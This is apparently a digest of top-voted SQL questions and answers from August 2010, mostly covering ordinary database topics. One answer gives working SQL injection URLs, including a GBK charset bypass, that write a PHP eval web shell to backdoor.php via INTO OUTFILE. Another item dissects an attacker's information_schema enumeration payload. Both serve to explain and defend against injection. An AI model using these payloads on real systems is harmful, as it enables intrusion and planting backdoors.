Best sql questions in August 2010

Only inserting a row if it's not already there

16 votes

I had always used something similar to the following to achieve it:

INSERT INTO TheTable
SELECT
    @primaryKey,
    @value1,
    @value2
WHERE
    NOT EXISTS
    (SELECT
        NULL
    FROM
        TheTable
    WHERE
        PrimaryKey = @primaryKey)

...but once under load, a primary key violation occurred. This is the only statement which inserts into this table at all. So does this mean that the above statement is not atomic?

The problem is that this is almost impossible to recreate at will.

Perhaps I could change it to the something like the following:

INSERT INTO TheTable
WITH
    (HOLDLOCK,
    UPDLOCK,
    ROWLOCK)
SELECT
    @primaryKey,
    @value1,
    @value2
WHERE
    NOT EXISTS
    (SELECT
        NULL
    FROM
        TheTable
    WITH
        (HOLDLOCK,
        UPDLOCK,
        ROWLOCK)
    WHERE
        PrimaryKey = @primaryKey)

Although, maybe I'm using the wrong locks or using too much locking or something.

I have seen other questions on stackoverflow.com where answers are suggesting a "IF (SELECT COUNT(*) ... INSERT" etc., but I was always under the (perhaps incorrect) assumption that a single SQL statement would be atomic.

Does anyone have any ideas?

Thanks.

Adam

What about the "JFDI" pattern?

BEGIN TRY
   INSERT etc
END TRY
BEGIN CATCH
    IF ERROR_NUMBER() <> 2627
      RAISERROR etc
END CATCH

Seriously, this is quickest and the most concurrent without locks, especially at high volumes. What if the UPDLOCK is escalated and the whole table is locked?

Read lesson 4

Difference between Delete and Truncate in sql server. Was I wrong... ?

14 votes

In a recent interview I was asked the difference between the two. I replied the general answere that all we know...

The interviewer then asked if truncate can be rollbacked ? I replied no...

The interviewer said that it can be rollbacked and asked me to go through the details of the behind the scene operation of both delete and truncate and check it later.

Well i posting this question here not for just the definition and the things we know... but to get to the core of it. Throwing light on this aspect will be highly appricieated ...

Thanks in advance

Apparently the idea that truncate can't be rolled back is a myth.

Summary

  • Truncate can be rolled back from within a transaction. The difference is that the truncate gets logged as a page deallocation in the log instead of a delete for each record being removed. Once the operation is committed it can't be undone.
  • When you truncate, you are resetting the identity field. When you delete, you are not.
  • You can't truncate a table that is referenced by a foreign key.
  • Truncating will not fire any ON DELETE triggers

Found a weak escape function for MySql, how to exploit?

13 votes

In an application I'm working on I've found a weak escape function to prevent injection. I'm trying to prove this, but I'm having trouble coming up with a simple example.

The escape function works as follows (PHP example).

function escape($value) {

  $value = str_replace("'","''",$value);
  $value = str_replace("\\","\\\\",$value);
  return $value;

}

I realize this doesn't deal with values encoded using double quotes ("), but all queries are constructed using single quotes (').

Who can defeat this escape function?

Requirements:

  • String in queries are always enclosed in quotes.
  • Double-quotes are never used.
  • MySQL connection is set to UTF8.

Simple examples:

$sql = "SELECT id FROM users WHERE username = '" . escape($username) . "' AND password = '" . escape($password) . "'";
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";

If you are just replacing ' with '' then you could exploit this by injecting a \' which will turn into a \'' and this will allow you to break out because this gives you a "character literal" single-quote and a real single-quote. However, the replacement of "\\" with "\\\\" negates this attack. The double-single-quote is used to "escape" single quotes for MS-SQL, but this isn't proper for MySQL, but it can work.

The following codes proves that this escape function is safe for all except three conditions. This code permutes though all possible variations of control charters, and testing each one to make sure an error doesn't occur with a single quote encased select statement. This code was tested on MySQL 5.1.41.

<?php
mysql_connect("localhost",'root','');
function escape($value) {

  $value = str_replace("'","''",$value);
  $value = str_replace("\\","\\\\",$value);
  return $value;

}

$chars=array("'","\\","\0","a");

for($w=0;$w<4;$w++){
    for($x=0;$x<4;$x++){
        for($y=0;$y<4;$y++){
            for($z=0;$z<4;$z++){
                mysql_query("select '".escape($chars[$w].$chars[$x].$chars[$y].$chars[$z])."'") or die("!!!! $w $x $y $z ".mysql_error());
            }       
        }
    }
}
print "Escape function is safe :(";
?>

Vulnerable Condition 1: no quote marks used.

mysql_query("select username from users where id=".escape($_GET['id']));

Exploit:

http://localhost/sqli_test.php?id=union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"

Vulnerable Condition 2: double quote marks used

mysql_query("select username from users where id=\"".escape($_GET['id'])."\"");

Exploit:

http://localhost/sqli_test.php?id=" union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1

Vulnerable Condition 2: single quotes are used, however an alternative character set is used..

mysql_set_charset("GBK")
mysql_query("select username from users where id='".escape($_GET['id'])."'");

Exploit:

http://localhost/sqli_test.php?id=%bf%27 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1

The conclusion is to always use mysql_real_escape_string() as the escape routine for MySQL. Parameterized query libraries like pdo and adodb always use mysql_real_escape_string() when connected to a mysql database. addslashes() is FAR BETTER of an escape routine because it takes care of vulnerable condition 2. It should be noted that not even mysql_real_escape_string() will stop condition 1, however a parameterized query library will.

This SELECT query takes 180 seconds to finish

10 votes

UPDATE:

Just to mention it on a more visible place. When I changed IN for =, the query execution time went from 180 down to 0.00008 seconds. Ridiculous speed difference.


This SQL query takes 180 seconds to finish! How is that possible? is there a way to optimize it to be faster?

SELECT IdLawVersionValidFrom 
FROM question_law_version 
WHERE IdQuestionLawVersion IN 
  (
  SELECT MAX(IdQuestionLawVersion) 
  FROM question_law_version 
  WHERE IdQuestionLaw IN 
    (
    SELECT MIN(IdQuestionLaw) 
    FROM question_law 
    WHERE IdQuestion=236 AND IdQuestionLaw>63
    )
  )

There are only about 5000 rows in each table so it shouldn't be so slow.

(Posting my comment as an answer as apparently it did make a difference!)

Any difference if you change the IN to =?

If anyone wants to investigate this further I've just done a test and found it very easy to reproduce.

Create Table

CREATE TABLE `filler` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  PRIMARY KEY (`id`)
) 

Create Procedure

CREATE PROCEDURE `prc_filler`(cnt INT)
BEGIN
        DECLARE _cnt INT;
        SET _cnt = 1;
        WHILE _cnt <= cnt DO
                INSERT
                INTO    filler
                SELECT  _cnt;
                SET _cnt = _cnt + 1;
        END WHILE;
END

Populate Table

  call prc_filler(5000)

Query 1

SELECT id 
FROM filler 
WHERE id =  (SELECT MAX(id) FROM filler  WHERE id =   
 ( SELECT MIN(id) 
    FROM filler
    WHERE id between 2000 and 3000
    )
  )

Equals Explain Output

Query 2 (same problem)

SELECT id 
FROM filler 
WHERE id in  (SELECT MAX(id) FROM filler  WHERE id in   
 ( SELECT MIN(id) 
    FROM filler
    WHERE id between 2000 and 3000
    )
  )

In Explain Output

Anybody using SQL Source Control from Red Gate

10 votes

We have been looking into possible solutions for our SQL Source control. I just came across Red Gates SQL Source control and wondered if anyone has implemented it? I am going to download the trial and give it a shot, but just wanted to see if others have real experience.

As always greatly appreciate the input

--S

I use SQL Compare for generating scripts when going from dev -> test -> production and it saves me tons of time.

For source control though, we use SVN and ScriptDB (http://scriptdb.codeplex.com/) though. I mainly use source control of SQL scripts for keeping track of changes. I think that rolling back a version of the database seldomly (if ever) works since data may have changed when making structure changes.

This works fine for a few of our current projects (largest is 200 tables and 2000 sprocs). The main reason for doing this though is cost since not all team members have to buy SQL Compare (I avoid adding dependencies to commercial projects unless really needed).

How to store ordered items which often change position in DB

9 votes

I need to be able to store a large list of ordered items in the DB. So far that's straight-forward:

ID Position OtherFields
 1     45      ...
 2   4736      ...
 3    514      ...
 ...

In queries, I always need to get just a few items (filtered based on OtherFields) but in the correct order. Easy as well, putting an index on Position and using "order by Position".

Now the problem: Items change their Position frequently, and not just by 1 or 2. If ID 2 changes the Position from 4736 to 2000, I need to update its Position and the Position of all elements between old Position 2000 and 4735, adding 1 in each row. And it's not only one ID that changes per transaction but a few, and there can be many transactions within a short time.

I think the most elegant way to handle the update problem would be using a linked list instead of a Position column where I can just remove ID 2 from its old position by linking its predecessor to its successor and then insert it elsewhere by linking it between its new predecessor and successor. That would be a constant and small number of updates per Position change and it would also be my preferred way of handling the changes (in Java in my case). However this raises the N+1 problem for querying in the correct order - even for a few elements, I have to go through the whole list in the worst case for finding out their correct order.

So my question is: What would you recommend to get a good balance between necessary updates and query performance?

So far I see two promising directions:

  1. Is there a DBMS (ideally OpenSource) that can handle linked lists not only with syntactic sugar but also with a good performance, e.g. by using internal Indices for the linked elements?

  2. Maybe it would also be an option to just have a BLOB where the whole Linked List would be stored in! How big could such a Linked List get / how much memory would it use in the DB and when fetched for let's say 1.000.000 entries? I'm using Java + Hibernate in case it matters. I imagine that processing even the whole list in memory after fetching the BLOB should be pretty fast!?

But of course other ideas are welcome as well!

If you relax the constraint that the Position column must contain integers from 1 to N and instead allow it to contain any numbers then you can do both searches and updates efficiently.

You can insert an item between two other items with position A and B by calculating the average (A + B) DIV 2. For example if A is 10000 and B is 12000 then your new position is 11000. Occasionally you will run out of gaps due to clustering, at which point you can run through the whole table redistributing the positions more evenly.

Data object storage - Can table JOIN's do what single table SELECT's cannot?

8 votes

Now that "NOSQL" or "object only" storage systems like MongoDB or memcached are really picking up steam in the world. I was wondering if there are any requests that cannot be performed on them that can be performed using multiple object joins (in SQL that is JOIN "table"). In other words, are there any multi-table queries that cannot be handled by several single table queries in a row?

Basically, is there a use-case were a multi-table join cannot be replicated by accessing one table at a time in object based storage systems?

Here are some examples of normal 3NF queries using has_man and has_many_through relations. These aren't the most complex queries - but they should give you a starting point for the concept. Note that any value in {} means a value of the result of the last query.


Company Has Many Users

SELECT user.*, company.name as company_name FROM user 
LEFT JOIN company ON company.id = user.company_id
WHERE user.id = 4

vs

SELECT * FROM user WHERE id = 4
SELECT * FROM company WHERE id = {user.comany_id}

Club Has Many Students Through Memberships

SELECT student.* FROM student LEFT JOIN membership on
membership.student_id = sudent.id WHERE membership.club_id = 5

vs

SELECT * FROM membership WHERE club.id = 5
SELECT * FROM student WHERE id = {membership.student_id}

The reason I'm wondering is because I want to know if Object-based systems (that rely on accessing single table objects at a time) can do what RDBMS databases like PostgreSQL or MySQL can do.

So far the only thing wrong seems to be that more queries are necessary.

1 - running multiple separated queries leaves you with consurrency mess - by the time you got something from table 1 it could have been deleted and it might still be in table 2 - now assume 5 correlated tables.

2 - running queries with at least moderately complex logic over fields that are not mythical ID

3 - controling the amount of data fetched (you hardly ever need more than 50% of the data which is needed to deserialize/create valid objects and even worse whole trees of connected objects)

4 - correlated queries (nested selects) which SQL server will optimize like joins to additive complexity or better (|T1|+|T2|+|T3|+|T4|) while any ORM or nonSQL will have to keep repeating inner queries and giving rise to multiplicative complexity (|T1||T2||T3|*|T4|)

5 - dataset sizes, scalability not just in dataset sizes but also in handling concurrency under updates. Even ORM-s which maintain transactions make them so long that chances for deadlocks increase exponentially.

6 - blind updates (a lot more data touched for no reason) and their dependency and failure based on a blind instrument (mythical version which is realistically needed in say 1% of relational data model but ORM and alikes have to have it everywhere)

7 - lack of any standards and compatibility - this means that your system and data will always be at much higher risk and dependent on software changes driven by academic adventurism rather that any actual business responsibility and with expectation to invest a lot of resources just in testing changes.

8 - data integrity - oops some code just deleted half of today's order records from T1 since there was no foreign key to T2 to stop it. Prefecly normal thing to do with separated queries.

9 - negative maturity trend - keeps splintering instead of standardizing - give it 20 yr and maybe it will get stable

Last but not least - it doesn't reduce any compexity (the same correlation between data is still there) but it makes it very hard to track and manage complexity or have any realistic remedy or transparency when something goes wrong. And it adds the complexity of 1-2 layers. If something goes wrong in your SQL tables you have tools and queries to discover and even fix your data. What are you going to do when some ORM just tells you that it has "invalid pointer" and throws exception since surely you don't want "invalid object" ?

I think that's enough :-)

Update statement running for too long or not

8 votes

I'm new to working with this much data (20 million rows) and I don't know what I should expect as far as query duration:

update table set field = '1234'  

No index on field. This statement took 25 minutes. The database is set to Simple Recovery. Does 25 minutes seem too long? Table has 9 columns with small data types <50 varchar.

IF you updated 20M rows in one single transaction, then your time was entirely driven by your IO subsystem: what kind of drives you have, what disk files layout etc. If you have 40 spindles in raid 10 with 4 balanced files and a separate similar battery for the log then the result is worryingly slow. If you tested this with one single MDF that shares the spindle with the LDF on a single consumer quality 5000rpm HDD then your time is amazingly fast.

Is there a portable way to have "SELECT FIRST 10 * FROM T" semantic?

7 votes

I want to read data in blocks of say 10k records from a database.

I found Result limits on wikipedia and it seems obvious that this can't done with sql in a portable way.

Another approach could be JdbcTemplate which offers many methods for queries, but how could I decide that enough rows have been read. Through the callbacks like RowMapper and ResultSetExtractor it can't be indicated, that enough data has been read.

EDIT: I was looking for a solution for JdbcTemplate This post suggests to use setMaxRows which I had overlooked.

Grab Hibernate or JPA. Both are familiar with various database dialects and will handle the nasty DB specifics under the hoods transparently.

In Hibernate you can paginate using Criteria#setFirstResult() and Criteria#setMaxResults(). E.g.

List users = session.createCriteria(User.class)
    .addOrder(Order.asc("id"))
    .setFirstResult(0) // Index of first row to be retrieved.
    .setMaxResults(10) // Amount of rows to be retrieved.
    .list();

In JPA you can do similar using Query#setFirstResult() and Query#setMaxResults().

List users = em.createQuery("SELECT u FROM User u ORDER BY u.id");
    .setFirstResult(0) // Index of first row to be retrieved.
    .setMaxResults(10) // Amount of rows to be retrieved.
    .getResultList();

Can you explain this SQL injection?

7 votes

The website i worked was recently attempted to be hacked by the following SQL injection script

boys' and 3=8 union 
select 1, 
concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30), char(9),0x252423),
3,4,5,6,7,8,9 

from `information_schema`.`tables` 

where table_schema=0x62646B3032 limit 44,1 -- And '8'='8

This injection returned the mysql table name. This was reported by the error reporting system on that website and we managed to fix that part however I am not able to understand what does the above injection mean?

Anyone can explain this?

Penuel

According to this the MySQL concat()

Returns the string that results from concatenating the arguments. May have one or more arguments. If all arguments are nonbinary strings, the result is a nonbinary string. If the arguments include any binary strings, the result is a binary string. A numeric argument is converted to its equivalent binary string form

So 0x232425 is converted to #$% which is simply added to the begining and end of the table_name field. Maybe just to make it easier for them to pull out the Table names later using Regex.

Later on the char(9) is equivalent to a tab as you can see here and is just there to format the output nicer.

The 3,4,5,6,7,8,9 is just there so that the columns match the boys table that they are performing the Union on.

SQL-Query: EXISTS in Subtable

7 votes

I have two tables tabData and tabDataDetail. I want all idData(PK) from Parent-Table(tabData) that have only rows in Child-Table(tabDataDetail, FK is fiData) with:

  • fiActionCode=11 alone or
  • fiactionCode=11 and fiActionCode=34

Any other combination is invalid. How to get them?

What i've tried without success(slow and gives me also rows that have only fiActioncode 34) :

alt text

Thanks for your Time.


EDIT: Thanks to all for their answers. Now i unfortunately have not enough time to check which one is best or works at all. I marked the first working one as answer.

EDIT2: i think that the marked answer is really the most efficient and compact solution.

EDIT3: Codesleuth's answer is interesting because it returns only rows than have only a single fiActionCode=11. Difficult to see, because that its only true for 20 tabDataDetail-rows ot of 41524189 total-rows that have two. Anyway that was not 100% what i've asked or rather what i was looking for.

Select ...
From tabData As T1
Where Exists    (
                Select 1
                From tabDataDetail As TDD1
                Where TDD1.fiData = T1.idData
                    And TDD1.fiactionCode = 11
                )
    And Not Exists    (
                      Select 1
                      From tabDataDetail As TDD1
                      Where TDD1.fiData = T1.idData
                          And TDD1.fiactionCode Not In(11,34)
                    )

To expand on my logic, the first check (a correction) is to ensure that a row with fiActionCode = 11 exists. The second check works by first defining the set of rows we do not want. We do not want anything that is something other than fiActionCode = 11 or 34. Because that is the set of items we do not want, we search for anything that does not exist in that set.

Why does "SELECT DISTINCT a, b FROM..." return fewer records than "SELECT DISTINCT A + '|' + B FROM..." ?

7 votes

I have a query that's selecting a bunch of fields related to names and addresses of customers but it boils down to:

SELECT DISTINCT a, b, c, ... FROM big_dumb_flat_table

it returns a bunch of records (10986590). When I replace the commas in the select-list to format it as a pipe-separated concatenated string:

SELECT DISTINCT a + '|' + b + '|' + c + '|' + ... FROM big_dumb_flat_table

it's returning 248 more records. I've reassured myself that there are no pipes in any of the fields that could be screwing the fidelity of the returned set. What's going on here?

Trailing spaces could cause this. For string comparisons these are ignored.

CREATE TABLE #T
(
a varchar(10),
b varchar(10),
c varchar(10)
)

INSERT INTO #T
SELECT 'a ' as a, 'b' as b, 'c ' as c union all
SELECT 'a' as a, 'b' as b, 'c ' as c

SELECT DISTINCT a, b, c  
FROM #T /*1 result*/

SELECT DISTINCT a + '|' + b + '|' + c + '|'   
FROM #T /*2 results*/


SELECT DISTINCT LTRIM(RTRIM(a)) + '|' + LTRIM(RTRIM(b)) + '|' +
                LTRIM(RTRIM(c)) + '|'   
FROM #T /*1 result*/

WITH (NOLOCK) vs SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED

7 votes

Could someone give me some guidance on when I should use WITH (NOLOCK) as opposed to SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED

What are the pros/cons of each? Are there any unintended consequences you've run into using one as opposed to the other?

They are the same thing. If you use the set transaction isolation level statement it will apply to all the tables in the connection, so if you only want a nolock on one or two tables use that, otherwise use the other.

Both will give you dirty reads, if you are OK with that, then use them. If you can't have dirty reads, then consider snapshot or serializable hints instead.

is it faster to check a Date for Null or a bit for = 1/0

6 votes

I'm just wondering what is it faster in sql

can have a column of Date and to check it for null or to have a Date and a bit and to check the bit for 1/0

is the bit going to be faster ?

In order to check that a column IS NULL SQL Server would actually just check a bit anyway. There is a NULL BITMAP stored for each row indicating whether each column contains a NULL or not.

Sql Server Legacy Database To Clustered index or not

6 votes

We have a legacy database which is a sql server db (2005, and 2008).

All of the primary keys in the tables are UniqueIdentifiers.

The tables currently have no clustered index created on them and we are running into performance issues on tables with only 750k records. This is the first database i've worked on with unique identifiers as the sole primary key and I've never seen sql server be this slow with returning data.

I don't want to create a clustered index on the uniqueidentifier as they are not sequential and will therefore slow the apps down when it comes to inserting data.

We cannot remove the uniqueidentifier as that is used for remote site record identity management purposes.

I had thought about adding a big integer identity column to the tables and creating the clustered index on this column and including the unique identifier column.

i.e.

int identity - First column to maintain insert speeds unique identifier - To ensure the application keeps working as expected.

The goal is to improve the identity query and joined table query performance.

Q1: Will this improve the query performance of the db or will it slow it down?

Q2: Is there an alternative to this that I haven't listed?

Thanks Pete

Edit: The performance issues are on retrieving data quickly through select statements, especially if a few of the more "transactional / changing" tables are joined together.

Edit 2: The joins between tables are generally all between the primary key and foreign keys, for tables that have foreign keys they are included in the non-clustered index to provide a more covering index.

The tables all have no other values which would provide a good clustered index.

I'm leaning more towards adding an additional identity column on each of the high load tables and then including the current Guid PK column within the clustered index to provide the best query performance.

Edit 3: I would estimate that 80% of the queries are performed on primary and foreign keys alone through the data access mechanism. Generally our data model has lazy loaded objects which perform the query when accessed, these queries use the objects id and the PK column. We have a large amount of user driven data exclusion / inclusion queries which use the foreign key columns as a filter based on the criteria of for type X exclude the following id's. The remaining 20% is where clauses on Enum (int) or date range columns, very few text based queries are performed in the system.

Where possible I have already added covering indexes to cover the heaviest queries, but as yet i'm still dissapointed by the performance. As bluefooted says the data is being stored as a heap.

If you don't have a clustered index on the table, it is being stored as a heap rather than a b-tree. Heap data access is absolutely atrocious in SQL Server so you definitely need to add a clustered index.

I agree with your analysis that the GUID column is a poor choice for clustering, especially since you don't have the ability to use NEWSEQUENTIALID(). You could create a new artificial integer key if you like, but if there is another column or combination of columns that would make sense as a clustered index, that is fine as well.

Do you have a field that is used frequently for range scans? Which columns are used for joins? Is there a combination of columns that also uniquely identifies the row aside from the GUID? Posting a sample of the data model would help us to suggest a good candidate for clustering.

Sql Server Displaying Items in specific order

6 votes

I have a list of items

ItemName Manufacturer TopSalesUnit

Item1     A             100   
Item2     A             80                      
Item3     A             60
Item4     B             70   
Item5     B             50   
Item6     B             30
Item7     C             10       
Item8     C             05

I would like the records to be ordered so that the highest TopSalesUnit item is shown first, then the next highest item from a different manufacturer is shown second, then the next highest item from a third manufacturer is shown, etc.:

ItemName Manufacturer TopSalesUnit

Item1       A             100    
Item4       B             070
Item7       C             010 
Item2       A             080
Item5       B             050 
Item8       C             005   
Item3       A             060 
Item6       B             030 

How to write a query in T-SQL to achieve it?

try:

DECLARE @YourTable table (ItemName varchar(10), Manufacturer char(1), TopSalesUnit int)

INSERT @YourTable VALUES ('Item1','A ',100)
INSERT @YourTable VALUES ('Item2','A ',80)                 
INSERT @YourTable VALUES ('Item3','A ',60)
INSERT @YourTable VALUES ('Item4','B ',70)   
INSERT @YourTable VALUES ('Item5','B ',50)   
INSERT @YourTable VALUES ('Item6','B ',30)
INSERT @YourTable VALUES ('Item7','C ',10)       
INSERT @YourTable VALUES ('Item8','C ',05)

SELECT
    dt.ItemName,dt.Manufacturer,dt.TopSalesUnit
    FROM (SELECT
              ItemName,Manufacturer,TopSalesUnit,ROW_NUMBER() OVER(PARTITION BY Manufacturer ORDER BY TopSalesUnit DESC) AS RowNumber
              FROM @YourTable
         ) dt 
    ORDER BY dt.RowNumber,dt.Manufacturer

OUTPUT:

ItemName   Manufacturer TopSalesUnit
---------- ------------ ------------
Item1      A            100
Item4      B            70
Item7      C            10
Item2      A            80
Item5      B            50
Item8      C            5
Item3      A            60
Item6      B            30

(8 row(s) affected)

How do you implement the equivalent of SQL IN() using .net

5 votes

In .net (c# or vb) expressions, how would you implement SQL's handy IN() functionality?

i.e. value in (1, 2, 4, 7)

rather than:

value = 1 or value = 2 or value = 4 or value = 7

There are obviously many ways, I'm looking for the most clean and simple!

using System;
using System.Linq;

static class SqlStyleExtensions
{
    public static bool In(this string me, params string[] set)
    {
       return set.Contains(me);
    }
}

Usage:

if (Variable.In("AC", "BC", "EA"))
{

}